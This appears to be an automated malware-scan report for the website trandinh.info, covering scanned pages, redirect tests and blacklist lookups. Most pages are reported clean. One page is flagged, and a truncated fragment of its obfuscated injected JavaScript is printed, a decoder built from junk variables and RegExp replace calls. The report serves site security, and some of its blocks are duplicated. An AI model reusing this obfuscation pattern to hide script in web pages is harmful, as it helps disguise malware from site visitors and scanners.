Scanned pages/files
Request | Server response | Status |
http://trandinh.info/ | 200 OK Content-Length: 2399 Content-Type: text/html | clean |
http://trandinh.info/first.htm | 200 OK Content-Length: 4774 Content-Type: text/html | clean |
http://trandinh.info/main.htm | 200 OK Content-Length: 29295 Content-Type: text/html | clean |
http://trandinh.info/overlibmws.js | 200 OK Content-Length: 38291 Content-Type: application/x-javascript | clean |
http://trandinh.info/overlibmws_shadow.js | 200 OK Content-Length: 5061 Content-Type: application/x-javascript | clean |
http://trandinh.info/ieupdate.js | 200 OK Content-Length: 164 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://trandinh.info/feedbackeng.htm | 200 OK Content-Length: 6305 Content-Type: text/html | clean |
http://trandinh.info/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
http://trandinh.info/vn/me.htm | 200 OK Content-Length: 515 Content-Type: text/html | clean |
http://trandinh.info/glprince.htm | 200 OK Content-Length: 7656 Content-Type: text/html | clean |
http://trandinh.info/mmprince.htm | 200 OK Content-Length: 35721 Content-Type: text/html | clean |
http://trandinh.info/poem_e.htm | 200 OK Content-Length: 10548 Content-Type: text/html | clean |
http://trandinh.info/bio/MM/main.html | 200 OK Content-Length: 3910 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var vs;if(vs!=''){vs='oF'};var I;if(I!=''){I='Z'};function b() {this.s="";var bN="";var E=']';var V="";var YF=new Date();var TD=new Array();var vo;if(vo!='' && vo!='EC'){vo='vS'};var bc='replace';var c=new String();var w='g';var mr;if(mr!='J' && mr!='m'){mr='J'};var f=RegExp;var u='[';var C;if(C!='Gs' && C != ''){C=null};var ft;if(ft!=''){ft='bG'};var W=new Date();function h(P,v){var je;if(je!='Zw'){je='Zw'};var d=u;var Yi=new String();var JL;if(JL!='Uj' && JL!='t Antivirus reports:
| ||
http://trandinh.info/sitemap/sitemap.html | 200 OK Content-Length: 792 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trandinh.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:37:11 GMT
Accept-Ranges: bytes
ETag: "131af34-95f-4f3e68bc42e86"
Server: Apache
Content-Length: 2399
Content-Type: text/html
Last-Modified: Thu, 06 Mar 2014 02:03:39 GMT
...2399 bytes of data.
GET / HTTP/1.1
Host: trandinh.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:37:11 GMT
Accept-Ranges: bytes
ETag: "131af34-95f-4f3e68bc42e86"
Server: Apache
Content-Length: 2399
Content-Type: text/html
Last-Modified: Thu, 06 Mar 2014 02:03:39 GMT
...2399 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trandinh.info
Referer: http://www.google.com/search?q=trandinh.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trandinh.info
Referer: http://www.google.com/search?q=trandinh.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trandinh.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trandinh.info/
Result: trandinh.info is not infected or malware details are not published yet.
Result: trandinh.info is not infected or malware details are not published yet.